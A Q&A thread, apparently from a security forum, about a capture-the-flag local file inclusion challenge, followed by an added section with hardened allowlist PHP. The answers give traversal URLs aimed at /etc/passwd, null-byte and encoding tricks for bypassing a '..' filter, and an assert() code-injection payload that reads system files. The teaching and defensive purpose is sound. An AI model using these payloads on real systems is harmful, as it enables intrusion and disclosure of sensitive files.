
I'm currently doing some practice about security and facing challenges provided on a website. One of them talks about LFI and I did figure out what to do, but I have no idea how to do this, so let me show you the problem:

Here is the url to hack:

http://example.com/challenge27/?page=contact

I'm asked to get the password in /etc/passwd, so the first idea that comes is to try some directory traversal:

http://example.com/challenge27/?page=.

This throws an exception:

Warning: assert(): Assertion "strpos('includes/..php', '..') === false" failed

What is obvious is that strpos detects every occurrence of '..' in the path and the assertion checks that this function returns a false value.

Then I try it by adding a null byte at the end of the same URL:

http://example.com/challenge27/?page=.%00

which gives me another hint:

Warning: file_exists() expects parameter 1 to be a valid path

But here I'm blocked, my goal is to inject the path to /etc/passwd like this:

http://example.com/challenge27/?page=../../../../etc/passwd

I feel like I can exploit the null byte solution, but after trying many different URLs I either got the file_exists() warning or the assert() one. I'm running out of ideas now; does somebody have one more hint to give?

SilverlightFox
onizukaek
    I don't see this website (no DNS record), but what does http://my_practice_website.com/challenge27/?page=/etc/passwd show? – George Y. Dec 30 '16 at 00:18
  • @GeorgeY. You can't register a .com domain with underscores. OP uses it as a placeholder. That said it would be easier if we'd get the original site. – Arminius Dec 30 '16 at 00:34
  • Yes this url is fake, just for the example, if you want the real challenge website I can give it by PM. – onizukaek Dec 30 '16 at 00:40
  • @onizukaek Please include it in your question if possible. – Arminius Dec 30 '16 at 00:42
  • @Arminius sorry, not possible. If I provide it here and you answer directly it would be against the website rules, which intend not to give or broadcast the solution until you have solved it by yourself, therefore I cannot quote the right domain here – onizukaek Dec 30 '16 at 01:00
  • Do you know what version of PHP it's running? Null byte injection was fixed a while ago iirc. – grc Dec 30 '16 at 01:06
  • so what does /challenge27/?page=/etc/passwd show? And what does /challenge27/?page=%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd show? – George Y. Dec 30 '16 at 02:26
  • @GeorgeY page=/etc/passwd shows "File does not exist" and the second one does not pass the filter – onizukaek Dec 30 '16 at 12:31

2 Answers

3

Usually it will be the path, followed by null byte in order to terminate the string when the C code runs that actually retrieves the file:

http://example.com/challenge27/?page=../../../../etc/passwd%00

Note that null byte characters don't work in up-to-date versions of PHP.

The other challenge is to get .. past the filter.

Try these to see if they can bypass this checking:

  • Try using 16-bit Unicode encoding (. = %u002e).
  • Try double URL encoding (. = %252e).
  • Try overlong UTF-8 Unicode encoding (. can be %c0%2e, %e0%40%ae, %c0ae)
SilverlightFox
  • Thank you for this information SilverlightFox, that's exactly what I wanted. I tried it; unfortunately the exploit was not what I thought, I get "Warning: file_exists() expects parameter 1 to be a valid path". I think I was completely wrong – onizukaek Dec 30 '16 at 12:56
  • I forgot to tell you the url I tried: /?page=%u002e%u002e/%u002e%u002e/%u002e%u002e/%u002e%u002e/etc/passwd%00 – onizukaek Dec 30 '16 at 13:20
1

Try passing a ' as input. If it throws an exception like Parse error: syntax error, unexpected '', '' (T_CONSTANT_ENCAPSED_STRING) in ... then it is vulnerable to code injection.

In that case you can open any file like:

' and die(show_source('/etc/passwd')) or '

more info at this write-up.

Shabgard
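Both answers point at the same root cause seen in the question's warnings: a '..' blacklist checked inside a string-evaluated assert(), which is both a weak path filter (first answer) and a code-injection sink (second answer). The following PHP is an added example, not the challenge site's real source or code from either answer; the function names, the `includes/` directory and the page list are assumptions reconstructed from the warning text, and it shows the weak pattern next to an allowlist-based replacement a defender would use.

```php
<?php
// Added example, not the challenge's real code. Reconstructed from the warning
// 'assert(): Assertion "strpos(\'includes/..php\', \'..\') === false" failed'.
//
// WEAK: a '..' blacklist inside a string assert(). Two problems, both visible on
// the page: (1) a string passed to assert() is evaluated as PHP code and $page is
// interpolated into it, so a quote in the input changes the code that runs;
// (2) forbidding '..' says nothing about absolute paths or encoded variants.
function weak_page_path(string $page): string
{
    assert("strpos('includes/{$page}.php', '..') === false");
    return "includes/{$page}.php";
}

// HARDENED: never derive a filesystem path from user input. Map the request
// parameter onto a fixed allowlist and fail closed on anything else.
const ALLOWED_PAGES = ['home', 'contact', 'about']; // constructed list (assumption)

function safe_page_path(string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;                          // unknown page: refuse, do not guess
    }
    $base = realpath(__DIR__ . '/includes');
    $path = realpath($base . '/' . $page . '.php');
    // Defence in depth: the resolved file must still live under includes/.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Usage: the raw parameter never reaches assert(), file_exists() or include.
$page = $_GET['page'] ?? 'home';
$path = safe_page_path($page);
if ($path === null) {
    http_response_code(404);
    exit('File does not exist');
}
require $path;
```

With the allowlist in place the encoding tricks from the first answer have nothing to bypass, and the assert() sink from the second answer no longer exists.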